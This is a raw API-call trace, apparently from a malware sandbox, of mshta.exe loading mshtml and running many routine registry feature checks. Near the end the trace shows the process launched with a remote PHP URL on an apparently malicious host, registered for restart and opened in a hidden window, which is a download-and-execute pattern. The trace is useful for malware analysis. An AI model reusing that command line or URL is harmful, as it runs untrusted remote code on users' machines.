[0063.373] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x78) returned 0x0
[0063.373] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x7c) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.378] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.378] RegCloseKey (hKey=0x0) returned 0x6
[0063.378] RegCloseKey (hKey=0x0) returned 0x6
[0063.378] RegCloseKey (hKey=0x78) returned 0x0
[0063.378] RegCloseKey (hKey=0x7c) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x78) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.378] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.378] RegCloseKey (hKey=0x0) returned 0x6
[0063.378] RegCloseKey (hKey=0x0) returned 0x6
[0063.378] RegCloseKey (hKey=0x7c) returned 0x0
[0063.378] RegCloseKey (hKey=0x78) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x78) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x7c) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.378] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.378] RegCloseKey (hKey=0x0) returned 0x6
[0063.378] RegCloseKey (hKey=0x0) returned 0x6
[0063.378] RegCloseKey (hKey=0x78) returned 0x0
[0063.378] RegCloseKey (hKey=0x7c) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.378] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x78) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.379] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x80) returned 0x0
[0063.379] SHRegGetValueW () returned 0x2
[0063.379] SHRegGetValueW () returned 0x2
[0063.379] RegCloseKey (hKey=0x80) returned 0x0
[0063.379] RegCloseKey (hKey=0x0) returned 0x6
[0063.379] RegCloseKey (hKey=0x0) returned 0x6
[0063.379] RegCloseKey (hKey=0x7c) returned 0x0
[0063.379] RegCloseKey (hKey=0x78) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x78) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x7c) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.379] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.379] RegCloseKey (hKey=0x0) returned 0x6
[0063.379] RegCloseKey (hKey=0x0) returned 0x6
[0063.379] RegCloseKey (hKey=0x78) returned 0x0
[0063.379] RegCloseKey (hKey=0x7c) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x78) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.379] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.379] RegCloseKey (hKey=0x0) returned 0x6
[0063.379] RegCloseKey (hKey=0x0) returned 0x6
[0063.379] RegCloseKey (hKey=0x7c) returned 0x0
[0063.379] RegCloseKey (hKey=0x78) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x78) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x7c) returned 0x0
[0063.379] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.379] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x78) returned 0x0
[0063.380] RegCloseKey (hKey=0x7c) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x78) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.380] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x7c) returned 0x0
[0063.380] RegCloseKey (hKey=0x78) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x78) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x7c) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.380] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x78) returned 0x0
[0063.380] RegCloseKey (hKey=0x7c) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x78) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.380] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x0) returned 0x6
[0063.380] RegCloseKey (hKey=0x7c) returned 0x0
[0063.380] RegCloseKey (hKey=0x78) returned 0x0
[0063.380] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x78) returned 0x0
[0063.381] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x7c) returned 0x0
[0063.381] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.381] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.381] RegCloseKey (hKey=0x0) returned 0x6
[0063.381] RegCloseKey (hKey=0x0) returned 0x6
[0063.381] RegCloseKey (hKey=0x78) returned 0x0
[0063.381] RegCloseKey (hKey=0x7c) returned 0x0
[0063.381] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.381] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x78) returned 0x0
[0063.381] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.381] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.381] RegCloseKey (hKey=0x0) returned 0x6
[0063.381] RegCloseKey (hKey=0x0) returned 0x6
[0063.381] RegCloseKey (hKey=0x7c) returned 0x0
[0063.381] RegCloseKey (hKey=0x78) returned 0x0
[0063.381] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x80) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.382] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.382] RegCloseKey (hKey=0x0) returned 0x6
[0063.382] RegCloseKey (hKey=0x0) returned 0x6
[0063.382] RegCloseKey (hKey=0x7c) returned 0x0
[0063.382] RegCloseKey (hKey=0x80) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x80) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x7c) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.382] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.382] RegCloseKey (hKey=0x0) returned 0x6
[0063.382] RegCloseKey (hKey=0x0) returned 0x6
[0063.382] RegCloseKey (hKey=0x80) returned 0x0
[0063.382] RegCloseKey (hKey=0x7c) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb18 | out: phkResult=0x2aeb18*=0x7c) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb20 | out: phkResult=0x2aeb20*=0x80) returned 0x0
[0063.382] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.382] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeaa8 | out: phkResult=0x2aeaa8*=0x0) returned 0x2
[0063.382] RegCloseKey (hKey=0x0) returned 0x6
[0063.382] RegCloseKey (hKey=0x0) returned 0x6
[0063.382] RegCloseKey (hKey=0x7c) returned 0x0
[0063.382] RegCloseKey (hKey=0x80) returned 0x0
[0063.382] GetSystemMetrics (nIndex=68) returned 4
[0063.383] GetSystemMetrics (nIndex=69) returned 4
[0063.383] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14
[0063.383] GetSystemDefaultLCID () returned 0x409
[0063.384] GetVersionExW (in: lpVersionInformation=0x2aeb10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2aeb10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0063.384] GetUserDefaultUILanguage () returned 0x409
[0063.384] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x2ae9b0, cchData=16 | out: lpLCData="\x03") returned 16
[0063.384] GetKeyboardLayoutList (in: nBuff=32, lpList=0x2aea10 | out: lpList=0x2aea10) returned 1
[0063.384] GetSystemMetrics (nIndex=4096) returned 0
[0063.384] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb78 | out: phkResult=0x2aeb78*=0x80) returned 0x0
[0063.384] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb80 | out: phkResult=0x2aeb80*=0x7c) returned 0x0
[0063.384] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb08 | out: phkResult=0x2aeb08*=0x0) returned 0x2
[0063.384] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb08 | out: phkResult=0x2aeb08*=0x0) returned 0x2
[0063.384] RegCloseKey (hKey=0x0) returned 0x6
[0063.384] RegCloseKey (hKey=0x0) returned 0x6
[0063.384] RegCloseKey (hKey=0x80) returned 0x0
[0063.384] RegCloseKey (hKey=0x7c) returned 0x0
[0063.385] GetModuleFileNameW (in: hModule=0x7fee0880000, lpFilename=0x2aea20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")) returned 0x1e
[0063.385] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a
[0063.385] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b
[0063.385] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d
[0063.385] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f
[0063.385] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e
[0063.385] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc194
[0063.385] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc195
[0063.385] GetDC (hWnd=0x0) returned 0x80108d2
[0063.385] SHCreateShellPalette (hdc=0x0) returned 0xd0808e2
[0063.385] GetPaletteEntries (in: hpal=0xd0808e2, iStart=0x0, cEntries=0x100, pPalEntries=0x7fee1043224 | out: pPalEntries=0x7fee1043224) returned 0x100
[0063.385] SHGetInverseCMAP (in: pbMap=0x7fee1046308, cbMap=0x8 | out: pbMap=0x7fee1046308) returned 0x0
[0063.385] GetDeviceCaps (hdc=0x80108d2, index=38) returned 32409
[0063.385] ReleaseDC (hWnd=0x0, hDC=0x80108d2) returned 1
[0063.386] GetCurrentProcessId () returned 0xbc0
[0063.386] _vsnprintf (in: _DstBuf=0x2aedc0, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x2aec68 | out: _DstBuf="#MSHTML#PERF#00000BC0") returned 21
[0063.386] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000BC0") returned 0x0
[0063.386] GetVersionExW (in: lpVersionInformation=0x2aeca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x10, dwBuildNumber=0x0, dwPlatformId=0x2aeda8, szCSDVersion="") | out: lpVersionInformation=0x2aeca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0063.386] GetModuleHandleW (lpModuleName="advapi32") returned 0x7feff8e0000
[0063.386] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventWrite") returned 0x7782b510
[0063.386] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventRegister") returned 0x7783cac0
[0063.386] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventUnregister") returned 0x77823c80
[0063.386] EtwEventRegister (in: ProviderId=0x7fee0ef0280, EnableCallback=0x7fee08843a0, CallbackContext=0x7fee1046310, RegHandle=0x7fee1044960 | out: RegHandle=0x7fee1044960) returned 0x0
[0063.386] EtwRegisterTraceGuidsW () returned 0x0
[0063.386] EtwRegisterTraceGuidsW () returned 0x0
[0063.386] EtwEventRegister (in: ProviderId=0x7fee0ef0290, EnableCallback=0x7fee08843a0, CallbackContext=0x7fee10464c0, RegHandle=0x7fee1044968 | out: RegHandle=0x7fee1044968) returned 0x0
[0063.386] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x2aea14 | out: lpdwHandle=0x2aea14) returned 0x0
[0063.387] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000
[0063.387] GetModuleFileNameW (in: hModule=0xff9d0000, lpFilename=0x2aea20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.387] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0063.407] GetCurrentProcessId () returned 0xbc0
[0063.407] GetCurrentProcessId () returned 0xbc0
[0063.424] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0x9c
[0063.424] GetLastError () returned 0x0
[0063.435] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xe0
[0063.435] MapViewOfFile (hFileMappingObject=0xe0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x100000
[0063.436] RegCloseKey (hKey=0x2a) returned 0x0
[0063.436] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000
[0063.436] GetProcAddress (hModule=0x776e0000, lpProcName="RegisterApplicationRestart") returned 0x7775f510
[0063.436] lstrlenA (lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 49
[0063.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x372f40, cbMultiByte=-1, lpWideCharStr=0x6d5d40, cchWideChar=50 | out: lpWideCharStr="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 50
[0063.436] RegisterApplicationRestart (pwzCommandline="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x0) returned 0x0
[0063.437] GetProcAddress (hModule=0x7fee0880000, lpProcName="RunHTMLApplication") returned 0x7fee0ad5b90
[0063.462] GetCommandLineW () returned="\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
[0063.463] OleInitialize (pvReserved=0x0) returned 0x0
[0063.488] IsWindow (hWnd=0x0) returned 0
[0063.488] RegisterClassW (lpWndClass=0x2af5f0) returned 0xc196
[0063.488] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xff9d0000, lpParam=0x7fee10426a0) returned 0x5001c
[0063.491] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x5001c, hMenu=0x0, hInstance=0xff9d0000, lpParam=0x7fee10426a0) returned 0x101fa
[0063.492] SetWindowLongW (hWnd=0x101fa, nIndex=-16, dwNewLong=-2100363264) returned 114229248
[0063.492] SetWindowPos (hWnd=0x101fa, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0063.493] SendMessageW (hWnd=0x101fa, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0063.513] PathRemoveArgsW (in: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0")
[0063.513] PathRemoveBlanksW (in: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0")
[0063.513] PathUnquoteSpacesW (in: lpsz="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: lpsz="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0
[0063.513] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppmk=0x2af700*=0x0, dwFlags=0x1 | out: ppmk=0x2af700*=0x395140) returned 0x0
[0063.564] CoCreateInstance (in: rclsid=0x7fee0ef0cf0*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee0f4de80*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7fee1042738 | out: ppv=0x7fee1042738*=0x3bd780) returned 0x0
[0063.576] GetCurrentThreadId () returned 0xbc4
[0063.577] RegisterClassExW (param_1=0x2ae0d0) returned 0xc197
